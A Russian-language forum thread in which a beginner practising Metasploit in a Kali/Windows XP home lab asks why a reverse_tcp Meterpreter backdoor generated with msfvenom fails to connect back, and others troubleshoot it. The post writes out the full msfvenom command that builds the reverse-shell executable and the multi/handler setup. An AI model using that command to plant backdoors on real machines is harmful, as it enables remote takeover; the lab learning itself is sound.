Зависает msfexploit при использовании payload windows/meterpreter/reverse_tcp

16.04.2020
12
0
Коллеги, помогите новичку.

Осваиваю метаэксплоит самостоятельно, поэтому не кидайте камнями. Хочу проэксплуатировать уязвимость используя сгенерированный бэкдор reverse_tcp

Есть 2 виртуальные машины:
1. Kali linux 192.168.18.129
2. Windows XP 2002 Service Pack 3 192.168.18.131

Итак хочу протестировать сгенерированный бэкдор с помощью команды

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.129 lport=4444 -f exe -o backdoor.exe (скрин)

Полученный бэкдор копирую на машину Windows XP. Запускаю (в процессах я его не вижу, может так и должно быть - незнаю). Но в окне командной строки которая появляется при выполнении, написано "This Program can't be run in DOS mode"

У себя на сервере kali запускаю msfconsole

затем use exploit/multi/handler. Устанавливаю параметры lhost и lport такие же как и при создании бэкдора. И запускаю.. И тишина. Ничего не происходит. Если проверить nmap - то порт у меня 4444 открыт. Может сам бэкдор не работает?

Пробовал его запустить на другой виртуалке с Windows 7 - но он не выполняется пишет что несовместима разрядность.

Подскажите, что я делаю не так?
 

Вложения

  • WinXpBackdoor.jpg
    WinXpBackdoor.jpg
    119,6 КБ · Просмотры: 357
  • создание бэкдора.jpg
    создание бэкдора.jpg
    31,6 КБ · Просмотры: 422
  • тупик.jpg
    тупик.jpg
    41,5 КБ · Просмотры: 555
Вот такое сообщение выдаёт на виртуалке Windows 7
 

Вложения

  • backdoor win7.jpg
    backdoor win7.jpg
    67,8 КБ · Просмотры: 311
Мне кажется,или ты RHOST не установил?
 
Разве при использовании reverse_tcp есть опция Rhost? Мы же не подключаемся к жертве, а она к нам подключается.
 
Визуально всё правильно, кроме ошибки при запуске пейлоад. WinXP под руками нет, но на W10 x64 работает. С LHOST/LPORT тоже всё ок.
Что говорит file backdoor.exe на Kali? Антивирус и файрвол выключены?
 
Визуально всё правильно, кроме ошибки при запуске пейлоад. WinXP под руками нет, но на W10 x64 работает. С LHOST/LPORT тоже всё ок.
Что говорит file backdoor.exe на Kali? Антивирус и файрвол выключены?
Говорит что исполняемый файл. Антивируса вообще нет никакого, брандмауэр тоже выключен.
 

Вложения

  • file backdoor.jpg
    file backdoor.jpg
    57,6 КБ · Просмотры: 321
Говорит что исполняемый файл. Антивируса вообще нет никакого, брандмауэр тоже выключен.
Ошибка говорит о том, что либо файл битый, либо metasploit что-то поменяли в плане совместимости с ОС (не должны :) ).
 
Ну файл битый вроде быть не должен :( несколько раз генерил заново.
А второе предположение тоже маловероятное. Вопрос остаётся открытым
 
Только узел. Машины все пингуются
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →

Популярный контент

🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab